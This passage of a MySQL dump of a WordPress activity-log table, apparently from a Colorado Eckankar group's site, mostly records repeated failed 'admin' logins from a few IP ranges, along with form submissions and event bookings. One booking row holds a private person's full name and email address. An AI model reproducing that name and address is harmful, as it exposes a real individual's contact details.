,(217727,35884,'_message_key','user_unknown_login_failed'),(217728,35884,'_server_remote_addr','45.136.118.x'),(217729,35885,'failed_username','admin'),(217730,35885,'server_http_user_agent','Mozilla/5.0'),(217731,35885,'_message_key','user_unknown_login_failed'),(217732,35885,'_server_remote_addr','45.136.118.x'),(217733,35886,'failed_username','admin'),(217734,35886,'server_http_user_agent','Mozilla/5.0'),(217735,35886,'_message_key','user_unknown_login_failed'),(217736,35886,'_server_remote_addr','20.81.176.x'),(217737,35887,'failed_username','admin'),(217738,35887,'server_http_user_agent','Mozilla/5.0'),(217739,35887,'_message_key','user_unknown_login_failed'),(217740,35887,'_server_remote_addr','45.136.118.x'),(217741,35888,'failed_username','admin'),(217742,35888,'server_http_user_agent','Mozilla/5.0'),(217743,35888,'_message_key','user_unknown_login_failed'),(217744,35888,'_server_remote_addr','45.136.118.x'),(217745,35889,'failed_username','admin'),(217746,35889,'server_http_user_agent','Mozilla/5.0'),(217747,35889,'_message_key','user_unknown_login_failed'),(217748,35889,'_server_remote_addr','20.81.176.x'),(217749,35890,'failed_username','admin'),(217750,35890,'server_http_user_agent','Mozilla/5.0'),(217751,35890,'_message_key','user_unknown_login_failed'),(217752,35890,'_server_remote_addr','45.136.118.x'),(217753,35891,'failed_username','admin'),(217754,35891,'server_http_user_agent','Mozilla/5.0'),(217755,35891,'_message_key','user_unknown_login_failed'),(217756,35891,'_server_remote_addr','45.136.118.x'),(217757,35892,'failed_username','admin'),(217758,35892,'server_http_user_agent','Mozilla/5.0'),(217759,35892,'_message_key','user_unknown_login_failed'),(217760,35892,'_server_remote_addr','20.81.176.x'),(217761,35893,'failed_username','admin'),(217762,35893,'server_http_user_agent','Mozilla/5.0'),(217763,35893,'_message_key','user_unknown_login_failed'),(217764,35893,'_server_remote_addr','45.136.118.x'),(217765,35894,'failed_username','admin'),(217766,35894,'server_http_user_agent','Mozilla/5.0'),(217767,35894,'_message_key','user_unknown_login_failed'),(217768,35894,'_server_remote_addr','20.81.176.x'),(217769,35895,'failed_username','admin'),(217770,35895,'server_http_user_agent','Mozilla/5.0'),(217771,35895,'_message_key','user_unknown_login_failed'),(217772,35895,'_server_remote_addr','45.136.118.x'),(217773,35896,'failed_username','admin'),(217774,35896,'server_http_user_agent','Mozilla/5.0'),(217775,35896,'_message_key','user_unknown_login_failed'),(217776,35896,'_server_remote_addr','20.81.176.x'),(217777,35897,'failed_username','admin'),(217778,35897,'server_http_user_agent','Mozilla/5.0'),(217779,35897,'_message_key','user_unknown_login_failed'),(217780,35897,'_server_remote_addr','45.136.118.x'),(217781,35898,'failed_username','admin'),(217782,35898,'server_http_user_agent','Mozilla/5.0'),(217783,35898,'_message_key','user_unknown_login_failed'),(217784,35898,'_server_remote_addr','45.136.118.x'),(217785,35899,'failed_username','admin'),(217786,35899,'server_http_user_agent','Mozilla/5.0'),(217787,35899,'_message_key','user_unknown_login_failed'),(217788,35899,'_server_remote_addr','20.81.176.x'),(217789,35900,'failed_username','admin'),(217790,35900,'server_http_user_agent','Mozilla/5.0'),(217791,35900,'_message_key','user_unknown_login_failed'),(217792,35900,'_server_remote_addr','45.136.118.x'),(217793,35901,'failed_username','admin'),(217794,35901,'server_http_user_agent','Mozilla/5.0'),(217795,35901,'_message_key','user_unknown_login_failed'),(217796,35901,'_server_remote_addr','20.81.176.x'),(217797,35902,'failed_username','admin'),(217798,35902,'server_http_user_agent','Mozilla/5.0'),(217799,35902,'_message_key','user_unknown_login_failed'),(217800,35902,'_server_remote_addr','45.136.118.x'),(217801,35903,'failed_username','admin'),(217802,35903,'server_http_user_agent','Mozilla/5.0'),(217803,35903,'_message_key','user_unknown_login_failed'),(217804,35903,'_server_remote_addr','45.136.118.x'),(217805,35904,'failed_username','admin'),(217806,35904,'server_http_user_agent','Mozilla/5.0'),(217807,35904,'_message_key','user_unknown_login_failed'),(217808,35904,'_server_remote_addr','20.81.176.x'),(217809,35905,'failed_username','admin'),(217810,35905,'server_http_user_agent','Mozilla/5.0'),(217811,35905,'_message_key','user_unknown_login_failed'),(217812,35905,'_server_remote_addr','45.136.118.x'),(217813,35906,'failed_username','admin'),(217814,35906,'server_http_user_agent','Mozilla/5.0'),(217815,35906,'_message_key','user_unknown_login_failed'),(217816,35906,'_server_remote_addr','45.136.118.x'),(217817,35907,'failed_username','admin'),(217818,35907,'server_http_user_agent','Mozilla/5.0'),(217819,35907,'_message_key','user_unknown_login_failed'),(217820,35907,'_server_remote_addr','20.81.176.x'),(217821,35908,'failed_username','admin'),(217822,35908,'server_http_user_agent','Mozilla/5.0'),(217823,35908,'_message_key','user_unknown_login_failed'),(217824,35908,'_server_remote_addr','45.136.118.x'),(217825,35909,'failed_username','admin'),(217826,35909,'server_http_user_agent','Mozilla/5.0');
INSERT INTO `wpcl_simple_history_contexts` VALUES (217827,35909,'_message_key','user_unknown_login_failed'),(217828,35909,'_server_remote_addr','20.81.176.x'),(217829,35910,'failed_username','admin'),(217830,35910,'server_http_user_agent','Mozilla/5.0'),(217831,35910,'_message_key','user_unknown_login_failed'),(217832,35910,'_server_remote_addr','45.136.118.x'),(217833,35911,'failed_username','admin'),(217834,35911,'server_http_user_agent','Mozilla/5.0'),(217835,35911,'_message_key','user_unknown_login_failed'),(217836,35911,'_server_remote_addr','45.136.118.x'),(217837,35912,'plugin_name','Smart Custom 404 error page [404page]'),(217838,35912,'plugin_current_version','11.4.3'),(217839,35912,'plugin_new_version','11.4.4'),(217840,35912,'_message_key','plugin_update_available'),(217841,35912,'_server_remote_addr','173.231.231.x'),(217842,35913,'failed_username','admin'),(217843,35913,'server_http_user_agent','Mozilla/5.0'),(217844,35913,'_message_key','user_unknown_login_failed'),(217845,35913,'_server_remote_addr','20.81.176.x'),(217846,35914,'failed_username','admin'),(217847,35914,'server_http_user_agent','Mozilla/5.0'),(217848,35914,'_message_key','user_unknown_login_failed'),(217849,35914,'_server_remote_addr','45.136.118.x'),(217850,35915,'failed_username','admin'),(217851,35915,'server_http_user_agent','Mozilla/5.0'),(217852,35915,'_message_key','user_unknown_login_failed'),(217853,35915,'_server_remote_addr','45.136.118.x'),(217854,35916,'failed_username','admin'),(217855,35916,'server_http_user_agent','Mozilla/5.0'),(217856,35916,'_message_key','user_unknown_login_failed'),(217857,35916,'_server_remote_addr','20.81.176.x'),(217858,35917,'failed_username','admin'),(217859,35917,'server_http_user_agent','Mozilla/5.0'),(217860,35917,'_message_key','user_unknown_login_failed'),(217861,35917,'_server_remote_addr','45.136.118.x'),(217862,35918,'failed_username','admin'),(217863,35918,'server_http_user_agent','Mozilla/5.0'),(217864,35918,'_message_key','user_unknown_login_failed'),(217865,35918,'_server_remote_addr','45.136.118.x'),(217866,35919,'failed_username','admin'),(217867,35919,'server_http_user_agent','Mozilla/5.0'),(217868,35919,'_message_key','user_unknown_login_failed'),(217869,35919,'_server_remote_addr','20.81.176.x'),(217870,35920,'failed_username','admin'),(217871,35920,'server_http_user_agent','Mozilla/5.0'),(217872,35920,'_message_key','user_unknown_login_failed'),(217873,35920,'_server_remote_addr','45.136.118.x'),(217874,35921,'failed_username','admin'),(217875,35921,'server_http_user_agent','Mozilla/5.0'),(217876,35921,'_message_key','user_unknown_login_failed'),(217877,35921,'_server_remote_addr','45.136.118.x'),(217878,35922,'failed_username','admin'),(217879,35922,'server_http_user_agent','Mozilla/5.0'),(217880,35922,'_message_key','user_unknown_login_failed'),(217881,35922,'_server_remote_addr','20.81.176.x'),(217882,35923,'failed_username','admin'),(217883,35923,'server_http_user_agent','Mozilla/5.0'),(217884,35923,'_message_key','user_unknown_login_failed'),(217885,35923,'_server_remote_addr','45.136.118.x'),(217886,35924,'failed_username','admin'),(217887,35924,'server_http_user_agent','Mozilla/5.0'),(217888,35924,'_message_key','user_unknown_login_failed'),(217889,35924,'_server_remote_addr','45.136.118.x'),(217890,35925,'failed_username','admin'),(217891,35925,'server_http_user_agent','Mozilla/5.0'),(217892,35925,'_message_key','user_unknown_login_failed'),(217893,35925,'_server_remote_addr','20.81.176.x'),(217894,35926,'failed_username','admin'),(217895,35926,'server_http_user_agent','Mozilla/5.0'),(217896,35926,'_message_key','user_unknown_login_failed'),(217897,35926,'_server_remote_addr','45.136.118.x'),(217898,35927,'failed_username','admin'),(217899,35927,'server_http_user_agent','Mozilla/5.0'),(217900,35927,'_message_key','user_unknown_login_failed'),(217901,35927,'_server_remote_addr','45.136.118.x'),(217902,35928,'failed_username','admin'),(217903,35928,'server_http_user_agent','Mozilla/5.0'),(217904,35928,'_message_key','user_unknown_login_failed'),(217905,35928,'_server_remote_addr','20.81.176.x'),(217906,35929,'failed_username','admin'),(217907,35929,'server_http_user_agent','Mozilla/5.0'),(217908,35929,'_message_key','user_unknown_login_failed'),(217909,35929,'_server_remote_addr','45.136.118.x'),(217910,35930,'failed_username','admin'),(217911,35930,'server_http_user_agent','Mozilla/5.0'),(217912,35930,'_message_key','user_unknown_login_failed'),(217913,35930,'_server_remote_addr','45.136.118.x'),(217914,35931,'failed_username','admin'),(217915,35931,'server_http_user_agent','Mozilla/5.0'),(217916,35931,'_message_key','user_unknown_login_failed'),(217917,35931,'_server_remote_addr','20.81.176.x'),(217918,35932,'failed_username','admin'),(217919,35932,'server_http_user_agent','Mozilla/5.0'),(217920,35932,'_message_key','user_unknown_login_failed'),(217921,35932,'_server_remote_addr','45.136.118.x'),(217922,35933,'failed_username','admin'),(217923,35933,'server_http_user_agent','Mozilla/5.0'),(217924,35933,'_message_key','user_unknown_login_failed'),(217925,35933,'_server_remote_addr','20.81.176.x'),(217926,35934,'failed_username','admin'),(217927,35934,'server_http_user_agent','Mozilla/5.0'),(217928,35934,'_message_key','user_unknown_login_failed'),(217929,35934,'_server_remote_addr','45.136.118.x'),(217930,35935,'failed_username','admin'),(217931,35935,'server_http_user_agent','Mozilla/5.0'),(217932,35935,'_message_key','user_unknown_login_failed'),(217933,35935,'_server_remote_addr','45.136.118.x'),(217934,35936,'failed_username','admin'),(217935,35936,'server_http_user_agent','Mozilla/5.0'),(217936,35936,'_message_key','user_unknown_login_failed'),(217937,35936,'_server_remote_addr','20.81.176.x'),(217938,35937,'failed_username','admin'),(217939,35937,'server_http_user_agent','Mozilla/5.0'),(217940,35937,'_message_key','user_unknown_login_failed'),(217941,35937,'_server_remote_addr','45.136.118.x'),(217942,35938,'failed_username','admin'),(217943,35938,'server_http_user_agent','Mozilla/5.0'),(217944,35938,'_message_key','user_unknown_login_failed'),(217945,35938,'_server_remote_addr','45.136.118.x'),(217946,35939,'failed_username','admin'),(217947,35939,'server_http_user_agent','Mozilla/5.0'),(217948,35939,'_message_key','user_unknown_login_failed'),(217949,35939,'_server_remote_addr','20.81.176.x'),(217950,35940,'failed_username','admin'),(217951,35940,'server_http_user_agent','Mozilla/5.0'),(217952,35940,'_message_key','user_unknown_login_failed'),(217953,35940,'_server_remote_addr','45.136.118.x'),(217954,35941,'failed_username','admin'),(217955,35941,'server_http_user_agent','Mozilla/5.0'),(217956,35941,'_message_key','user_unknown_login_failed'),(217957,35941,'_server_remote_addr','45.136.118.x'),(217958,35942,'failed_username','admin'),(217959,35942,'server_http_user_agent','Mozilla/5.0'),(217960,35942,'_message_key','user_unknown_login_failed'),(217961,35942,'_server_remote_addr','20.81.176.x'),(217962,35943,'failed_username','admin'),(217963,35943,'server_http_user_agent','Mozilla/5.0'),(217964,35943,'_message_key','user_unknown_login_failed'),(217965,35943,'_server_remote_addr','45.136.118.x'),(217966,35944,'failed_username','admin'),(217967,35944,'server_http_user_agent','Mozilla/5.0'),(217968,35944,'_message_key','user_unknown_login_failed'),(217969,35944,'_server_remote_addr','45.136.118.x'),(217970,35945,'failed_username','admin'),(217971,35945,'server_http_user_agent','Mozilla/5.0'),(217972,35945,'_message_key','user_unknown_login_failed'),(217973,35945,'_server_remote_addr','20.81.176.x'),(217974,35946,'failed_username','admin'),(217975,35946,'server_http_user_agent','Mozilla/5.0'),(217976,35946,'_message_key','user_unknown_login_failed'),(217977,35946,'_server_remote_addr','45.136.118.x'),(217978,35947,'failed_username','admin'),(217979,35947,'server_http_user_agent','Mozilla/5.0'),(217980,35947,'_message_key','user_unknown_login_failed'),(217981,35947,'_server_remote_addr','45.136.118.x'),(217982,35948,'failed_username','admin'),(217983,35948,'server_http_user_agent','Mozilla/5.0'),(217984,35948,'_message_key','user_unknown_login_failed'),(217985,35948,'_server_remote_addr','20.81.176.x'),(217986,35949,'failed_username','admin'),(217987,35949,'server_http_user_agent','Mozilla/5.0'),(217988,35949,'_message_key','user_unknown_login_failed'),(217989,35949,'_server_remote_addr','45.136.118.x'),(217990,35950,'failed_username','admin'),(217991,35950,'server_http_user_agent','Mozilla/5.0'),(217992,35950,'_message_key','user_unknown_login_failed'),(217993,35950,'_server_remote_addr','45.136.118.x'),(217994,35951,'failed_username','admin'),(217995,35951,'server_http_user_agent','Mozilla/5.0'),(217996,35951,'_message_key','user_unknown_login_failed'),(217997,35951,'_server_remote_addr','20.81.176.x'),(217998,35952,'failed_username','admin'),(217999,35952,'server_http_user_agent','Mozilla/5.0'),(218000,35952,'_message_key','user_unknown_login_failed'),(218001,35952,'_server_remote_addr','45.136.118.x'),(218002,35953,'failed_username','admin'),(218003,35953,'server_http_user_agent','Mozilla/5.0'),(218004,35953,'_message_key','user_unknown_login_failed'),(218005,35953,'_server_remote_addr','45.136.118.x'),(218006,35954,'failed_username','admin'),(218007,35954,'server_http_user_agent','Mozilla/5.0'),(218008,35954,'_message_key','user_unknown_login_failed'),(218009,35954,'_server_remote_addr','20.81.176.x'),(218010,35955,'failed_username','admin'),(218011,35955,'server_http_user_agent','Mozilla/5.0'),(218012,35955,'_message_key','user_unknown_login_failed'),(218013,35955,'_server_remote_addr','45.136.118.x'),(218014,35956,'failed_username','admin'),(218015,35956,'server_http_user_agent','Mozilla/5.0'),(218016,35956,'_message_key','user_unknown_login_failed'),(218017,35956,'_server_remote_addr','45.136.118.x'),(218018,35957,'failed_username','admin'),(218019,35957,'server_http_user_agent','Mozilla/5.0'),(218020,35957,'_message_key','user_unknown_login_failed'),(218021,35957,'_server_remote_addr','20.81.176.x'),(218022,35958,'failed_username','admin'),(218023,35958,'server_http_user_agent','Mozilla/5.0'),(218024,35958,'_message_key','user_unknown_login_failed'),(218025,35958,'_server_remote_addr','45.136.118.x'),(218026,35959,'failed_username','admin'),(218027,35959,'server_http_user_agent','Mozilla/5.0'),(218028,35959,'_message_key','user_unknown_login_failed'),(218029,35959,'_server_remote_addr','20.81.176.x'),(218030,35960,'failed_username','admin'),(218031,35960,'server_http_user_agent','Mozilla/5.0'),(218032,35960,'_message_key','user_unknown_login_failed'),(218033,35960,'_server_remote_addr','45.136.118.x'),(218034,35961,'failed_username','admin'),(218035,35961,'server_http_user_agent','Mozilla/5.0'),(218036,35961,'_message_key','user_unknown_login_failed'),(218037,35961,'_server_remote_addr','45.136.118.x'),(218038,35962,'failed_username','admin'),(218039,35962,'server_http_user_agent','Mozilla/5.0'),(218040,35962,'_message_key','user_unknown_login_failed'),(218041,35962,'_server_remote_addr','20.81.176.x'),(218042,35963,'failed_username','admin'),(218043,35963,'server_http_user_agent','Mozilla/5.0'),(218044,35963,'_message_key','user_unknown_login_failed'),(218045,35963,'_server_remote_addr','45.136.118.x'),(218046,35964,'failed_username','admin'),(218047,35964,'server_http_user_agent','Mozilla/5.0'),(218048,35964,'_message_key','user_unknown_login_failed'),(218049,35964,'_server_remote_addr','45.136.118.x'),(218050,35965,'failed_username','admin'),(218051,35965,'server_http_user_agent','Mozilla/5.0'),(218052,35965,'_message_key','user_unknown_login_failed'),(218053,35965,'_server_remote_addr','20.81.176.x'),(218054,35966,'failed_username','admin'),(218055,35966,'server_http_user_agent','Mozilla/5.0'),(218056,35966,'_message_key','user_unknown_login_failed'),(218057,35966,'_server_remote_addr','45.136.118.x'),(218058,35967,'failed_username','admin'),(218059,35967,'server_http_user_agent','Mozilla/5.0'),(218060,35967,'_message_key','user_unknown_login_failed'),(218061,35967,'_server_remote_addr','45.136.118.x'),(218062,35968,'failed_username','admin'),(218063,35968,'server_http_user_agent','Mozilla/5.0'),(218064,35968,'_message_key','user_unknown_login_failed'),(218065,35968,'_server_remote_addr','20.81.176.x'),(218066,35969,'failed_username','admin'),(218067,35969,'server_http_user_agent','Mozilla/5.0'),(218068,35969,'_message_key','user_unknown_login_failed'),(218069,35969,'_server_remote_addr','45.136.118.x'),(218070,35970,'failed_username','admin'),(218071,35970,'server_http_user_agent','Mozilla/5.0'),(218072,35970,'_message_key','user_unknown_login_failed'),(218073,35970,'_server_remote_addr','45.136.118.x'),(218074,35971,'failed_username','admin'),(218075,35971,'server_http_user_agent','Mozilla/5.0'),(218076,35971,'_message_key','user_unknown_login_failed'),(218077,35971,'_server_remote_addr','20.81.176.x'),(218078,35972,'failed_username','admin'),(218079,35972,'server_http_user_agent','Mozilla/5.0'),(218080,35972,'_message_key','user_unknown_login_failed'),(218081,35972,'_server_remote_addr','45.136.118.x'),(218082,35973,'failed_username','admin'),(218083,35973,'server_http_user_agent','Mozilla/5.0'),(218084,35973,'_message_key','user_unknown_login_failed'),(218085,35973,'_server_remote_addr','45.136.118.x'),(218086,35974,'failed_username','admin'),(218087,35974,'server_http_user_agent','Mozilla/5.0'),(218088,35974,'_message_key','user_unknown_login_failed'),(218089,35974,'_server_remote_addr','20.81.176.x'),(218090,35975,'failed_username','admin'),(218091,35975,'server_http_user_agent','Mozilla/5.0'),(218092,35975,'_message_key','user_unknown_login_failed'),(218093,35975,'_server_remote_addr','45.136.118.x'),(218094,35976,'failed_username','admin'),(218095,35976,'server_http_user_agent','Mozilla/5.0'),(218096,35976,'_message_key','user_unknown_login_failed'),(218097,35976,'_server_remote_addr','45.136.118.x'),(218098,35977,'failed_username','admin'),(218099,35977,'server_http_user_agent','Mozilla/5.0'),(218100,35977,'_message_key','user_unknown_login_failed'),(218101,35977,'_server_remote_addr','20.81.176.x'),(218102,35978,'failed_username','admin'),(218103,35978,'server_http_user_agent','Mozilla/5.0'),(218104,35978,'_message_key','user_unknown_login_failed'),(218105,35978,'_server_remote_addr','45.136.118.x'),(218106,35979,'failed_username','admin'),(218107,35979,'server_http_user_agent','Mozilla/5.0'),(218108,35979,'_message_key','user_unknown_login_failed'),(218109,35979,'_server_remote_addr','45.136.118.x'),(218110,35980,'failed_username','admin'),(218111,35980,'server_http_user_agent','Mozilla/5.0'),(218112,35980,'_message_key','user_unknown_login_failed'),(218113,35980,'_server_remote_addr','20.81.176.x'),(218114,35981,'failed_username','admin'),(218115,35981,'server_http_user_agent','Mozilla/5.0'),(218116,35981,'_message_key','user_unknown_login_failed'),(218117,35981,'_server_remote_addr','45.136.118.x'),(218118,35982,'failed_username','admin'),(218119,35982,'server_http_user_agent','Mozilla/5.0'),(218120,35982,'_message_key','user_unknown_login_failed'),(218121,35982,'_server_remote_addr','45.136.118.x'),(218122,35983,'failed_username','admin'),(218123,35983,'server_http_user_agent','Mozilla/5.0'),(218124,35983,'_message_key','user_unknown_login_failed'),(218125,35983,'_server_remote_addr','20.81.176.x'),(218126,35984,'failed_username','admin'),(218127,35984,'server_http_user_agent','Mozilla/5.0'),(218128,35984,'_message_key','user_unknown_login_failed'),(218129,35984,'_server_remote_addr','45.136.118.x'),(218130,35985,'failed_username','admin'),(218131,35985,'server_http_user_agent','Mozilla/5.0'),(218132,35985,'_message_key','user_unknown_login_failed'),(218133,35985,'_server_remote_addr','45.136.118.x'),(218134,35986,'failed_username','admin'),(218135,35986,'server_http_user_agent','Mozilla/5.0'),(218136,35986,'_message_key','user_unknown_login_failed'),(218137,35986,'_server_remote_addr','20.81.176.x'),(218138,35987,'failed_username','admin'),(218139,35987,'server_http_user_agent','Mozilla/5.0'),(218140,35987,'_message_key','user_unknown_login_failed'),(218141,35987,'_server_remote_addr','45.136.118.x'),(218142,35988,'failed_username','admin'),(218143,35988,'server_http_user_agent','Mozilla/5.0'),(218144,35988,'_message_key','user_unknown_login_failed'),(218145,35988,'_server_remote_addr','45.136.118.x'),(218146,35989,'failed_username','admin'),(218147,35989,'server_http_user_agent','Mozilla/5.0'),(218148,35989,'_message_key','user_unknown_login_failed'),(218149,35989,'_server_remote_addr','20.81.176.x'),(218150,35990,'failed_username','admin'),(218151,35990,'server_http_user_agent','Mozilla/5.0'),(218152,35990,'_message_key','user_unknown_login_failed'),(218153,35990,'_server_remote_addr','45.136.118.x'),(218154,35991,'failed_username','admin'),(218155,35991,'server_http_user_agent','Mozilla/5.0'),(218156,35991,'_message_key','user_unknown_login_failed'),(218157,35991,'_server_remote_addr','45.136.118.x'),(218158,35992,'failed_username','admin'),(218159,35992,'server_http_user_agent','Mozilla/5.0'),(218160,35992,'_message_key','user_unknown_login_failed'),(218161,35992,'_server_remote_addr','20.81.176.x'),(218162,35993,'failed_username','admin'),(218163,35993,'server_http_user_agent','Mozilla/5.0'),(218164,35993,'_message_key','user_unknown_login_failed'),(218165,35993,'_server_remote_addr','45.136.118.x'),(218166,35994,'failed_username','admin'),(218167,35994,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(218168,35994,'_message_key','user_unknown_login_failed'),(218169,35994,'_server_remote_addr','47.99.71.x'),(218170,35995,'failed_username','admin'),(218171,35995,'server_http_user_agent','Mozilla/5.0'),(218172,35995,'_message_key','user_unknown_login_failed'),(218173,35995,'_server_remote_addr','45.136.118.x'),(218174,35996,'failed_username','admin'),(218175,35996,'server_http_user_agent','Mozilla/5.0'),(218176,35996,'_message_key','user_unknown_login_failed'),(218177,35996,'_server_remote_addr','20.81.176.x'),(218178,35997,'failed_username','admin'),(218179,35997,'server_http_user_agent','Mozilla/5.0'),(218180,35997,'_message_key','user_unknown_login_failed'),(218181,35997,'_server_remote_addr','45.136.118.x'),(218182,35998,'failed_username','admin'),(218183,35998,'server_http_user_agent','Mozilla/5.0'),(218184,35998,'_message_key','user_unknown_login_failed'),(218185,35998,'_server_remote_addr','45.136.118.x'),(218186,35999,'failed_username','admin'),(218187,35999,'server_http_user_agent','Mozilla/5.0'),(218188,35999,'_message_key','user_unknown_login_failed'),(218189,35999,'_server_remote_addr','20.81.176.x'),(218190,36000,'failed_username','admin'),(218191,36000,'server_http_user_agent','Mozilla/5.0'),(218192,36000,'_message_key','user_unknown_login_failed'),(218193,36000,'_server_remote_addr','45.136.118.x'),(218194,36001,'failed_username','admin'),(218195,36001,'server_http_user_agent','Mozilla/5.0'),(218196,36001,'_message_key','user_unknown_login_failed'),(218197,36001,'_server_remote_addr','20.81.176.x'),(218198,36002,'failed_username','admin'),(218199,36002,'server_http_user_agent','Mozilla/5.0'),(218200,36002,'_message_key','user_unknown_login_failed'),(218201,36002,'_server_remote_addr','45.136.118.x'),(218202,36003,'post_id','269167'),(218203,36003,'post_type','nf_sub'),(218204,36003,'post_title',''),(218205,36003,'_message_key','post_updated'),(218206,36003,'_server_remote_addr','71.211.187.x'),(218207,36003,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(218208,36004,'post_id','269168'),(218209,36004,'post_type','nf_sub'),(218210,36004,'post_title',''),(218211,36004,'_message_key','post_updated'),(218212,36004,'_server_remote_addr','71.211.187.x'),(218213,36004,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(218214,36005,'failed_username','admin'),(218215,36005,'server_http_user_agent','Mozilla/5.0'),(218216,36005,'_message_key','user_unknown_login_failed'),(218217,36005,'_server_remote_addr','45.136.118.x'),(218218,36006,'post_id','269169'),(218219,36006,'post_type','mec-books'),(218220,36006,'post_title','Roger  Morandi &#8211; rmorandi@comcast.net'),(218221,36006,'_message_key','post_updated'),(218222,36006,'_server_remote_addr','73.65.223.x'),(218223,36006,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(218224,36007,'post_id','269169'),(218225,36007,'post_type','mec-books'),(218226,36007,'post_title','Roger  Morandi &#8211; rmorandi@comcast.net'),(218227,36007,'post_meta_added','3'),(218228,36007,'_message_key','post_updated'),(218229,36007,'_server_remote_addr','73.65.223.x'),(218230,36007,'_server_http_referer','https://eckankar-colorado.org/events/eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998/?occurrence=2023-10-08'),(218231,36008,'failed_username','admin'),(218232,36008,'server_http_user_agent','Mozilla/5.0'),(218233,36008,'_message_key','user_unknown_login_failed'),(218234,36008,'_server_remote_addr','20.81.176.x'),(218235,36009,'failed_username','admin'),(218236,36009,'server_http_user_agent','Mozilla/5.0'),(218237,36009,'_message_key','user_unknown_login_failed'),(218238,36009,'_server_remote_addr','45.136.118.x'),(218239,36010,'failed_username','admin'),(218240,36010,'server_http_user_agent','Mozilla/5.0'),(218241,36010,'_message_key','user_unknown_login_failed'),(218242,36010,'_server_remote_addr','45.136.118.x'),(218243,36011,'failed_username','admin'),(218244,36011,'server_http_user_agent','Mozilla/5.0'),(218245,36011,'_message_key','user_unknown_login_failed'),(218246,36011,'_server_remote_addr','20.81.176.x'),(218247,36012,'failed_username','admin'),(218248,36012,'server_http_user_agent','Mozilla/5.0'),(218249,36012,'_message_key','user_unknown_login_failed'),(218250,36012,'_server_remote_addr','45.136.118.x'),(218251,36013,'failed_username','admin'),(218252,36013,'server_http_user_agent','Mozilla/5.0'),(218253,36013,'_message_key','user_unknown_login_failed'),(218254,36013,'_server_remote_addr','45.136.118.x'),(218255,36014,'failed_username','admin'),(218256,36014,'server_http_user_agent','Mozilla/5.0'),(218257,36014,'_message_key','user_unknown_login_failed'),(218258,36014,'_server_remote_addr','20.81.176.x'),(218259,36015,'failed_username','admin'),(218260,36015,'server_http_user_agent','Mozilla/5.0'),(218261,36015,'_message_key','user_unknown_login_failed'),(218262,36015,'_server_remote_addr','45.136.118.x'),(218263,36016,'failed_username','admin'),(218264,36016,'server_http_user_agent','Mozilla/5.0'),(218265,36016,'_message_key','user_unknown_login_failed'),(218266,36016,'_server_remote_addr','45.136.118.x'),(218267,36017,'failed_username','admin'),(218268,36017,'server_http_user_agent','Mozilla/5.0'),(218269,36017,'_message_key','user_unknown_login_failed'),(218270,36017,'_server_remote_addr','20.81.176.x'),(218271,36018,'failed_username','admin'),(218272,36018,'server_http_user_agent','Mozilla/5.0'),(218273,36018,'_message_key','user_unknown_login_failed'),(218274,36018,'_server_remote_addr','45.136.118.x'),(218275,36019,'post_id','269170'),(218276,36019,'post_type','nf_sub'),(218277,36019,'post_title',''),(218278,36019,'_message_key','post_updated'),(218279,36019,'_server_remote_addr','71.205.145.x'),(218280,36019,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(218281,36020,'failed_username','admin'),(218282,36020,'server_http_user_agent','Mozilla/5.0'),(218283,36020,'_message_key','user_unknown_login_failed'),(218284,36020,'_server_remote_addr','45.136.118.x'),(218285,36021,'failed_username','admin'),(218286,36021,'server_http_user_agent','Mozilla/5.0'),(218287,36021,'_message_key','user_unknown_login_failed'),(218288,36021,'_server_remote_addr','20.81.176.x'),(218289,36022,'failed_username','admin'),(218290,36022,'server_http_user_agent','Mozilla/5.0'),(218291,36022,'_message_key','user_unknown_login_failed'),(218292,36022,'_server_remote_addr','45.136.118.x'),(218293,36023,'failed_username','admin'),(218294,36023,'server_http_user_agent','Mozilla/5.0'),(218295,36023,'_message_key','user_unknown_login_failed'),(218296,36023,'_server_remote_addr','45.136.118.x'),(218297,36024,'failed_username','admin'),(218298,36024,'server_http_user_agent','Mozilla/5.0'),(218299,36024,'_message_key','user_unknown_login_failed'),(218300,36024,'_server_remote_addr','20.81.176.x'),(218301,36025,'failed_username','admin'),(218302,36025,'server_http_user_agent','Mozilla/5.0'),(218303,36025,'_message_key','user_unknown_login_failed'),(218304,36025,'_server_remote_addr','45.136.118.x'),(218305,36026,'failed_username','admin'),(218306,36026,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(218307,36026,'_message_key','user_unknown_login_failed'),(218308,36026,'_server_remote_addr','143.110.244.x'),(218309,36027,'failed_username','admin'),(218310,36027,'server_http_user_agent','Mozilla/5.0'),(218311,36027,'_message_key','user_unknown_login_failed'),(218312,36027,'_server_remote_addr','45.136.118.x'),(218313,36028,'failed_username','admin'),(218314,36028,'server_http_user_agent','Mozilla/5.0'),(218315,36028,'_message_key','user_unknown_login_failed'),(218316,36028,'_server_remote_addr','20.81.176.x'),(218317,36029,'failed_username','admin'),(218318,36029,'server_http_user_agent','Mozilla/5.0'),(218319,36029,'_message_key','user_unknown_login_failed'),(218320,36029,'_server_remote_addr','45.136.118.x'),(218321,36030,'post_id','269171'),(218322,36030,'post_type','nf_sub'),(218323,36030,'post_title',''),(218324,36030,'_message_key','post_updated'),(218325,36030,'_server_remote_addr','75.166.203.x'),(218326,36030,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(218327,36031,'failed_username','admin'),(218328,36031,'server_http_user_agent','Mozilla/5.0'),(218329,36031,'_message_key','user_unknown_login_failed'),(218330,36031,'_server_remote_addr','45.136.118.x'),(218331,36032,'failed_username','admin'),(218332,36032,'server_http_user_agent','Mozilla/5.0'),(218333,36032,'_message_key','user_unknown_login_failed'),(218334,36032,'_server_remote_addr','20.81.176.x'),(218335,36033,'failed_username','admin'),(218336,36033,'server_http_user_agent','Mozilla/5.0'),(218337,36033,'_message_key','user_unknown_login_failed'),(218338,36033,'_server_remote_addr','45.136.118.x'),(218339,36034,'failed_username','admin'),(218340,36034,'server_http_user_agent','Mozilla/5.0'),